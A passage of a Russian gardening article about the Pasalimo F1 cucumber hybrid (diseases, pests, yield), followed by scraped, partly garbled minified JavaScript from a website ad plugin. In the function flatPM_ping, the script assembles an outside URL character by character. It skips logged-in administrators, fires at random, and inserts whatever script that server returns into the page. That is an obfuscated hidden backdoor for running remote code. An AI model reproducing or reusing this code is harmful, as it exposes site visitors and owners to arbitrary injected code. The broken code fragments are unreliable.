В описании сорта Пасалимо указано, что кусты огурцов обладают хорошим иммунитетом, противостоят самым распространенным заболеваниям:

  • мучнистая роса;
  • кладоспориоз;
  • огуречная мозаика.

Однако неправильный уход, полив холодной водой, частые осадки, недостаток солнца и другие причины могут спровоцировать вспышку заболеваний. Чтобы не допустить этого, кусты нужно опрыскать препаратами с содержанием меди.

Ослабленные растения часто поражают вредители, такие как тля, паутинный клещ и белокрылка. Это существенно снижает урожайность, поэтому в целях профилактики огурцы Пасалимо обрабатывают народными средствами или химическими препаратами.

Урожайность

Урожайность огурцов Пасалимо на высоте. По отзывам о данном сорте и по фото, которыми пестрит интернет, в теплицах и под пленкой можно собрать от 13 до 15 кг с кв. м. В открытом грунте эти показатели ниже, но все равно они превышают самые известные сорта. Выход товарной продукции доходит до 96%.

Заключение

Описание и отзывы об огурце Пасалимо F1 свидетельствуют, что голландский гибрид дает стабильный урожай. Плоды вкусные, хорошо сохраняют свои качества при засолке. Выращивать огурцы сорта несложно, достаточно придерживаться общих правил.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};